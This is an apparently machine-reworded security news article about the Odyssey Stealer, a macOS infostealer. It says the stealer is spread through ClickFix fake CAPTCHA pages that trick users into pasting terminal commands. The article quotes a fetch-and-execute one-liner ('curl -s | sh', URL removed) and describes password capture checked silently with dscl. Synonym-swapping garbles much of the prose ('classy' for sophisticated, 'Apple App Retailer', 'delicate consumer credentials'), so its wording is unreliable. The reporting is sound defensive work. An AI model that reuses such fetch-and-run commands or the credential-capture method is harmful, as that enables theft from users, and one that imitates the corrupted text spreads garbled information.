A classy new malware marketing campaign focusing on macOS customers has emerged, using misleading “Clickfix” ways to distribute malicious AppleScripts designed to reap delicate consumer credentials and monetary information.
The marketing campaign leverages typosquatted domains that intently mimic authentic finance platforms and Apple App Retailer web sites, making a convincing facade that tips customers into executing harmful instructions on their programs.
The assault begins when customers inadvertently go to malicious domains that current faux Cloudflare-style CAPTCHA prompts.
These seemingly authentic verification pages instruct macOS customers to repeat and paste Base64-encoded instructions into their terminal functions to show they don’t seem to be robots.
As soon as executed, these instructions provoke a complete information theft operation that targets browser credentials, cryptocurrency wallets, and delicate private data saved throughout a number of functions.
Cyfirma researchers recognized this malware because the Odyssey Stealer, a rebranded model of the beforehand identified Poseidon Stealer that itself originated as a fork of the AMOS Stealer.
The analysis crew uncovered a number of command-and-control panels linked to this exercise, with infrastructure primarily hosted in Russia.
The malware demonstrates a transparent choice for focusing on customers in Western nations, notably the USA and European Union, whereas conspicuously avoiding victims in Commonwealth of Unbiased States nations.
The Odyssey Stealer represents a regarding evolution in macOS-targeting malware, combining social engineering ways with subtle technical capabilities.
Not like conventional malware that depends on software program vulnerabilities, this marketing campaign exploits human psychology by presenting customers with familiar-looking safety prompts that seem like routine verification procedures.
The attackers have rigorously crafted their distribution web sites to reflect trusted platforms, making detection notably difficult for unsuspecting customers.
An infection Mechanism and Payload Execution
The malware’s an infection mechanism depends on a multi-stage course of that begins with area typosquatting and culminates in complete system compromise.
ClickFix distribution move (Supply – Cyfirma)
When customers go to the malicious domains, they encounter professionally designed pages that replicate the looks of authentic CAPTCHA verification programs.
The faux immediate shows directions for macOS customers to execute a command that seems as follows:-
curl -s | sh
This command retrieves and executes an AppleScript from the attacker’s command-and-control server. The script employs alphanumeric obfuscation to cover perform names, although evaluation reveals its true goal.
Upon execution, the malware creates a short lived listing construction utilizing the mkdir command, particularly establishing /tmp/lovemrtrump as its operational base.
The AppleScript then shows a convincing authentication immediate designed to seize the consumer’s system password.
To validate stolen credentials silently, it leverages the macOS dscl command with the authonly parameter, guaranteeing the verification course of stays hidden from the consumer.
This method permits the malware to verify password validity with out triggering system alerts or consumer suspicion, demonstrating the attackers’ deep understanding of macOS safety mechanisms.
Examine reside malware conduct, hint each step of an assault, and make quicker, smarter safety choices -> Attempt ANY.RUN now
